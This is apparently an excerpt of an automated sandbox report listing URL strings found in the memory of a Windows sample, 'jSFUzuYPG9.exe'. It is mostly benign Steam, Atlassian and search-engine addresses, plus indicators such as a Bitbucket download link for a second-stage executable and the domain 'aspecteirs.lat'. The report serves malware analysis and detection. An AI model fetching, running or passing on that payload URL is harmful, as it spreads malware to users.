Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aspecteirs.lat/
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/f
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000002.1976145039.00000000012FB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/z
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: jSFUzuYPG9.exe String found in binary or memory: https://community.fastly.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRt
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.71
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l==
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
